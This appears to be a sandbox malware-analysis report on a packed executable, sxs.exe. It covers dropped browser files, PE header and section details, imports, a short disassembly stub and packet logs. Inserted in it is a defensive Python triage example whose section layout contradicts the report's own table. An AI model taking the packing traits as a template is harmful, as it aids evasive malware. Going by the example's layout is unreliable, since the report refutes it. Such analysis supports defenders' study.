                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:downloaded
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          URL:https://ad-delivery.net/px.gif?ch=2
                                                                          Preview:GIF89a.............!.......,...........L..;
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):114
                                                                          Entropy (8bit):4.802925647778009
                                                                          Encrypted:false
                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                          Malicious:false
                                                                          URL:http://www.onefordvd.com/
                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:dropped
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          Preview:GIF89a.............!.......,...........L..;
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (1618)
                                                                          Category:dropped
                                                                          Size (bytes):153712
                                                                          Entropy (8bit):5.543908040352106
                                                                          Encrypted:false
                                                                          SSDEEP:1536:jX/xbg4DuPemooPy7WnHPh4a2EwG19OxHRdjhJBjDSc4Y52kovgwlZXqjzsZ1Dsb:459cjhJB7wkeesZtpmqc+VHu
                                                                          MD5:AFB4209CCD6E51715D5531A402BD7E14
                                                                          SHA1:ADF3EAB92B54152E0A7498D609A396A91FAB65D9
                                                                          SHA-256:D216B710A6CF1CC124B3D38A43561C69387971D09C3ABDA3FC0DFBDABDEEDA08
                                                                          SHA-512:A3F257448B946AB21F7676A7796555581104B1BC119E284A7F30D48BBB38F76AE23A31E3441F54A01FF79B66DBA02A0D34CCB608B030B5758F3304317B1407B7
                                                                          Malicious:false
                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"syndicatedsearch.goog",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301431,17301433,17301436,17301511,17301515,17301516,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog"}};var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):391
                                                                          Entropy (8bit):4.729520059969888
                                                                          Encrypted:false
                                                                          SSDEEP:6:t6q+mc4slzTPl2O4UYaeLIT4W+KS4S1UpMTQpi6jUs8sh6B+BSmK0C:t6q+FPUPkHSt1UiT6i6jUs8b0I0C
                                                                          MD5:1DD79DF28A7517F4F8688A66EDFB04FC
                                                                          SHA1:4AA1200E3E4B50AEB64774E6667DDE9422658C38
                                                                          SHA-256:5FC5D398706CE2D79CA71EAB32AB611D4511260B2D87B9D6D74A8EF59F9BEA8F
                                                                          SHA-512:70CD8282458482ED3F123C0E61C81D1C257C2D4AF12D51674BDF46C748B576CC92CC364CB7DC49D1D7E6D5A4C11AD85AA8E798692414468F0F4531DF95ECF326
                                                                          Malicious:false
                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/><path d="M0 0h24v24H0z" fill="none"/></svg>.
                                                                          File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.763459210430956
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Targa bitmap (Original TGA Format) (7/2) 0.00%
                                                                          File name:sxs.exe
                                                                          File size:55'448 bytes
                                                                          MD5:4f89e3a88853265154e24969581fb45a
                                                                          SHA1:d5ae12cfe50ac91702da2ccd4e21321ef256ea2a
                                                                          SHA256:ee77a17f0c1ff00fb7eb9a453ec22bb63ae382256211b6aa5db67c48e52fed73
                                                                          SHA512:a5a8cd57d6158113552d345dbaaec41175c45bd8a6d1558f0fa4c0b7596c32630e1f5c9f0824aa856467ff06bdb4013f486402cab085e67d87536f8af7dd0eba
                                                                          SSDEEP:1536:8BZMeVfnEM+jlv4mXwLX3Pb29jb0Y+YUjL3IVokJ3:8jMsfnEMmqEUfiNb0YA3OF
                                                                          TLSH:8943F1465E06B5BECCE331314E678C0AFC52EFC49DA9B61E6BC42034D9FA288E1E5854
                                                                          File Content Preview:MZ..........PE..L........................~........................@..........................p...................@...........................S..(...........................................................VT.................................................
                                                                          Icon Hash:00928e8e8686b000
                                                                          Entrypoint:0x43cca5
                                                                          Entrypoint Section:es2z1
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x11 [Thu Jan 1 00:00:17 1970 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:5a498eee87e4d89512a84502f500181f
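The static fields above (entry point, entry-point section, image base, characteristics flags, link timestamp, entropy) all come straight out of the PE headers. The Python below is an added example, not Joe Sandbox code and not part of the sample: since the sample's bytes are not reproduced on this page, it assembles a constructed PE32 header carrying the values the report lists (entry point 0x43cca5 in a section named es2z1, image base 0x400000, timestamp 0x11, the seven listed characteristics flags, subsystem GUI, empty DLL characteristics) and parses it back the way a static triage tool would, decoding the flag bits and timestamp and calling out what a triager would flag: an epoch-adjacent timestamp, an entry point outside a standard code section, and no DYNAMIC_BASE. The two-section layout and the section sizes are assumptions; the real file's section table is not shown here.

```python
"""PE header triage: an added example for this report, not Joe Sandbox code.
The sample's bytes are not on the page, so build_sample_header() assembles a
constructed PE32 header with the values the report lists, and parse_pe() reads
it back the way a static triage tool would."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# IMAGE_FILE_* bits of the COFF Characteristics word (PE/COFF specification).
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE", 0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE", 0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL", 0x8000: "BYTES_REVERSED_HI",
}
DYNAMIC_BASE = 0x0040  # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (ASLR opt-in)
EARLIEST_REAL_LINK_TIME = 788_918_400  # 1995-01-01 UTC; earlier stamps are not real link times


def decode_flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def shannon_entropy(buf):
    """Bits per byte, like the report's 'Entropy (8bit)'; near 8.0 means packed/encrypted."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def build_sample_header():
    """Constructed header with an ASSUMED two-section layout; not the real sxs.exe bytes."""
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    sections = [(b".text", 0x1000, 0x3B000), (b"es2z1", 0x3C000, 0x2000)]  # (name, VA, size)
    chars = 0x0001 | 0x0002 | 0x0004 | 0x0008 | 0x0080 | 0x0100 | 0x8000  # the report's seven flags
    # Machine i386, section count, TimeDateStamp 0x11, no symbols, optional-header size.
    coff = struct.pack("<HHIIIHH", 0x014C, len(sections), 0x11, 0, 0, 0xE0, chars)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x3CCA5)    # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)   # ImageBase
    struct.pack_into("<HH", opt, 40, 4, 0)      # OS version 4.0
    struct.pack_into("<HH", opt, 48, 4, 0)      # subsystem version 4.0
    struct.pack_into("<HH", opt, 68, 2, 0)      # WINDOWS_GUI, DllCharacteristics empty
    sec_hdrs = b"".join(struct.pack("<8sIIIIIIHHI", name, size, va, size, 0, 0, 0, 0, 0, 0)
                        for name, va, size in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + sec_hdrs


def parse_pe(data):
    """DOS header -> PE signature -> COFF header -> PE32 optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) optional headers are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsec):
        name, vsize, va, raw = struct.unpack_from("<8sIII", data, opt + opt_size + i * 40)
        sections.append((name.rstrip(b"\0").decode("latin-1"), va, max(vsize, raw)))
    entry_sec = next((n for n, va, size in sections if va <= entry_rva < va + size), None)
    return {
        "machine": machine, "timestamp": stamp,
        "timestamp_utc": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "characteristics": chars, "characteristic_names": decode_flags(chars, CHARACTERISTICS),
        "dll_characteristics": dll_chars, "subsystem": subsystem,
        "image_base": image_base, "entry_rva": entry_rva,
        "entry_point": image_base + entry_rva, "entry_section": entry_sec, "sections": sections,
    }


def triage_findings(info):
    """Header-only red flags a reviewer would raise before running anything."""
    out = []
    if info["timestamp"] < EARLIEST_REAL_LINK_TIME:
        out.append(f"timestamp 0x{info['timestamp']:x} ({info['timestamp_utc']} UTC) is not a plausible link time")
    if info["entry_section"] not in (".text", "CODE"):
        out.append(f"entry point 0x{info['entry_point']:x} lies in section {info['entry_section']!r}, not a standard code section")
    if not info["dll_characteristics"] & DYNAMIC_BASE:
        out.append("no DYNAMIC_BASE: the image never relocates, so no ASLR")
    if "RELOCS_STRIPPED" in info["characteristic_names"]:
        out.append("RELOCS_STRIPPED: image can only load at ImageBase")
    return out
```

Running parse_pe on the constructed header reproduces the report's values (characteristics word 0x818F, entry point 0x43cca5 = ImageBase 0x400000 + RVA 0x3cca5, timestamp 1970-01-01 00:00:17) and triage_findings returns four flags. On a real file, read the bytes with open(path, "rb") and pass them to parse_pe and shannon_entropy; a per-section entropy over each section's raw bytes is the usual next step when, as here, the whole-file value sits near 7.8.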
                                                                          Instruction
                                                                          push edx
                                                                          push ecx
                                                                          add esp, 04h
                                                                          jmp 00007F492080B0B2h
                                                                          sub ebx, 41E16041h
                                                                          add ebx, 41E16041h
                                                                          mov dword ptr [esp-04h], ebx
                                                                          push ebx
                                                                          push edi
                                                                          push edi
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x453ec | 0x28 | es2z1
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x31000 | 0xb0 | es2z0
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x45456 | 0x18 | es2z1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
es2z0 | 0x1000 | 0x37000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
es2z1 | 0x38000 | 0xe000 | 0xd600 | d5d9a00037985da756e079aae7486f06 | False | 0.9354191004672897 | data | 7.783668165941755 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
es2z2 | 0x46000 | 0x5c8 | 0x3a | f6003dc46eb9658bba1c679d6584d6ab | False | 1.1896551724137931 | data | 5.616601684782744 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

DLL | Import
kernel32.dll | GetProcAddress, GetModuleHandleA, LoadLibraryA
                                                                          Aug 29, 2024 17:12:16.804088116 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.807085991 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.807104111 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.810275078 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.810372114 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.810381889 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.816690922 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.816736937 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.816752911 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.822585106 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.822654963 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.822663069 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.828437090 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.828524113 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.828532934 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.834490061 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.834558964 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.834569931 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.857175112 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.857204914 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.857279062 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.857302904 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.857338905 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.857347012 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.857353926 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.857388973 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.857501030 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.872215986 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.872289896 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.872297049 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.873363018 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.873400927 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.873452902 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.873461008 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.873507977 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.884258986 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.884581089 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.884627104 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.884654045 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.884664059 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.884751081 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.890176058 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.896195889 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.896224022 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.896475077 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.896490097 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.896580935 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.902203083 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.906074047 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.906140089 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.906213045 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.906222105 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.906270027 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.911117077 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.916476965 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.916512966 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.916578054 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.916589022 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.916642904 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.921818972 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.926660061 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.926745892 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.926810026 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.926820040 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.926882982 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.931303024 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.935723066 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.935811996 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.935868025 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.935877085 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.935933113 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.939897060 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.944026947 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.944140911 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.944201946 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.944211006 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.944262028 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.948054075 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.952045918 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.952089071 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.952146053 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.952157021 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.952198029 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.956382036 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.960395098 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.960567951 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.960617065 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.960624933 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.960670948 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.965183020 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.966286898 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.966319084 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.966344118 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.966357946 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.966367006 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.966397047 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.968650103 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.968724012 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.968732119 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.970774889 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.973062992 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.973069906 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.973582029 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.975769997 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.975832939 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.975835085 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.975845098 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.975891113 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.977722883 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.980297089 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.980329990 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.980357885 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.980365992 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.980371952 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.982542038 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.983434916 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.983442068 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.984755039 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.984816074 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.984822989 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.986999035 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.987051010 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.987057924 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.989212990 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.992393970 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.992430925 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.992454052 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.992464066 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.992506027 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.994432926 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.996253014 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.996314049 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.996321917 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:16.996361017 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:16.996366978 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:17.000123024 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:17.000669956 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:17.000678062 CEST44353743142.250.186.68192.168.2.5
